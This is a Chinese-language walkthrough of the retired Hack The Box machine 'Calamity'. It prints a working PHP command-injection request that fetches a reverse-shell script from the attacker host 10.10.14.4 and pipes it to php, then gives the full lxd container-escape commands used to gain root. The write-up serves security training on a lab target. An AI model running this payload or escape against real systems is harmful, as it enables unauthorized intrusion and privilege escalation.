本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.27
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令
autorecon 10.10.10.27 -o ./calamity-autorecon
最终的扫描结果
得知开放两个端口,先访问80端口
没发现啥有价值的信息,看下上面程序跑的目录情况
发现200响应码 有最下面几个,访问了,确认admin.php看似是可以利用的
上面试了试admin/admin弱口令并未成功,然后看下burpsuite抓包情况
发现密码,使用此密码以用户admin进行登录
登录成功之后,显示上述信息,根据上述信息的提示可以是使用php进行命令执行,试了试还真可以
那么可以执行命令那么就反弹shell,这里开始使用nc,发现成功反弹之后又被踢出去了,后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致,所以我这直接使用curl命令下载php反弹shell然后执行成功反弹,下面是反弹shell请求包
GET /admin.php?html=%3C%3Fphp+system%28('curl+http://10.10.14.4:8000/rev.php+|php')%29%3F%3E HTTP/1.1 Host: 10.10.10.27 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://10.10.10.27/admin.php Cookie: adminpowa=noonecares Connection: close
下载枚举脚本枚举可用的提权信息,没发现啥有价值的信息,看了下目标普通用户的家目录,发现如下信息
有些音频文件,将其传到本地kali使用工具导入合并多听几遍得出密码为18547936..* 对应登录ssh用户xalvas
成功登陆目标靶机用户xalvas,执行id命令发现含有lxd,可以通过lxd进行提权,相关参考:
https://reboare.github.io/lxd/lxd-escape.html
具体整个的提权命令如下:
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder/ sudo ./build-alpine -a i686 wget http://10.10.14.4:8000/alpine-v3.12-x86_64-20201103_0108.tar.gz lxc image import alpine-v3.12-i686-20201110_2252.tar.gz --alias bmfx lxc image list lxc init bmfx privesc -c security.privileged=true lxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc --mode=interactive /bin/sh cat /mnt/root/root/root.txt
